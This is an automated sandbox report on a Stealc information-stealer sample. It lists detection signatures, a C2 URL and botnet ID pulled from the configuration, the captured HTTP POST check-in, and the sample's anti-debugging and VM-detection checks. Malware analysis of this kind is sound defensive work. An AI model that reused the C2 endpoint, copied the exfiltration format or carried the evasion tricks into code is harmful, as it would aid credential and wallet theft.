
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545193
MD5: 08c45770fb113a8cc6eabcf3eb588ca6
SHA1: a034829953fc29313687c189cff3990faa2cb3d1
SHA256: 93faedac76dce091632f52fcbabc5e2148ad2e9e145e2f44bdf733416301c15b
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 08C45770FB113A8CC6EABCF3EB588CA6)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Yara matches (PCAP):
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Yara matches (memory dumps):
Source: 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2057789916.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 4448 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 4448 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Yara matches (unpacked PEs):
Source: 0.2.file.exe.360000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata IDS alert:
Timestamp: 2024-10-30T08:22:06.290913+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.360000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00379030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036A2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003672A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003740F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00361710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003747C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00373B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00374B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKK
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 39 32 34 36 38 35 34 31 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a
  Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="hwid"F892468541661964116302------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="build"tale------CGIDGCGIEGDGDGDGHJKK--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003662D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKK
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 39 32 34 36 38 35 34 31 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a
  Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="hwid"F892468541661964116302------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="build"tale------CGIDGCGIEGDGDGDGHJKK--
Source: file.exe, 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%
Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/s
Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpEs
Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/J
Source: file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A0098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00392138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BB198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003CE258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A4288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B228B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BF37A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003EB308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DD39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B83D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E53C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BD4EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00384573
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038E544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A45A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003CD5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DA648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007886D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E96FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A66C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BD720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D6799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B4868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B98B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B68F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BB8A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00824858
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003CF8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BBA17
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00834B92
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D4BA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D0B88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C8BD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DAC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B4C9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003CAD38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00391D78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BBD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B5DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B9DF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B4DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A8E78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DBE1A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D1EE8
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00364610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: qogoldvk ZLIB complexity 0.9947474502535341
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00379790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00373970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D5RU27Q2.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2104320 > 1048576
Source: file.exe | Static PE information: Raw size of qogoldvk is bigger than: 0x100000 < 0x196c00
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.360000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qogoldvk:EW;tvuayiyt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qogoldvk:EW;tvuayiyt:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00379BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x206068 should be: 0x20648b
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: qogoldvk
Source: file.exe | Static PE information: section name: tvuayiyt
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074706B push esi; mov dword ptr [esp], eax (0_2_0074709C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074706B push 18ABE20Ch; mov dword ptr [esp], esi (0_2_007470A4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066F04D push ecx; mov dword ptr [esp], 7F76AC18h (0_2_0066F091)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066F04D push ebp; mov dword ptr [esp], edx (0_2_0066F127)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066F04D push ebp; mov dword ptr [esp], edi (0_2_0066F14F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0085C0BF push 490D1565h; mov dword ptr [esp], ebp (0_2_0085C14B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089F0D6 push ecx; mov dword ptr [esp], edx (0_2_0089F111)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push eax; mov dword ptr [esp], esi (0_2_007B3105)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push eax; mov dword ptr [esp], 3751FDC9h (0_2_007B3184)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push eax; mov dword ptr [esp], 76EB4465h (0_2_007B31A6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push 17E91298h; mov dword ptr [esp], eax (0_2_007B3286)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push edx; mov dword ptr [esp], 27A6C39Eh (0_2_007B32C5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push ebx; mov dword ptr [esp], esi (0_2_007B33BA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push 29399800h; mov dword ptr [esp], edi (0_2_007B3401)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push ebx; mov dword ptr [esp], ebp (0_2_007B3407)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push edi; mov dword ptr [esp], edx (0_2_007B3413)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push eax; mov dword ptr [esp], 05E7B47Dh (0_2_007B346C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push 27F0C01Fh; mov dword ptr [esp], ebp (0_2_007B34CD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push ecx; mov dword ptr [esp], edi (0_2_007B34DF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push edi; mov dword ptr [esp], 6BFFCF7Dh (0_2_007B352B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push esi; mov dword ptr [esp], 177F106Fh (0_2_007B35BD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push eax; mov dword ptr [esp], 0ADFA4E6h (0_2_007B362E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push 078F139Bh; mov dword ptr [esp], edi (0_2_007B3665)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push ecx; mov dword ptr [esp], ebp (0_2_007B36FF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push 183029D5h; mov dword ptr [esp], edi (0_2_007B374A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push eax; mov dword ptr [esp], ebx (0_2_007B37FD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push ecx; mov dword ptr [esp], ebx (0_2_007B3804)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push ecx; mov dword ptr [esp], edx (0_2_007B383F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push ebx; mov dword ptr [esp], ecx (0_2_007B3871)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push edx; mov dword ptr [esp], 2F7BC274h (0_2_007B3876)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B30FA push 426A6686h; mov dword ptr [esp], edx (0_2_007B3940)
Source: file.exe | Static PE information: section name: qogoldvk entropy: 7.95459631398814

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00379BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-37646)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C4CCD second address: 7C4CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C4CD5 second address: 7C4CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F51CD041DF8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C4CE6 second address: 7C4CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C4CEA second address: 7C4CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C3F19 second address: 7C3F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F51CCC6C586h 0x00000010 rdtsc
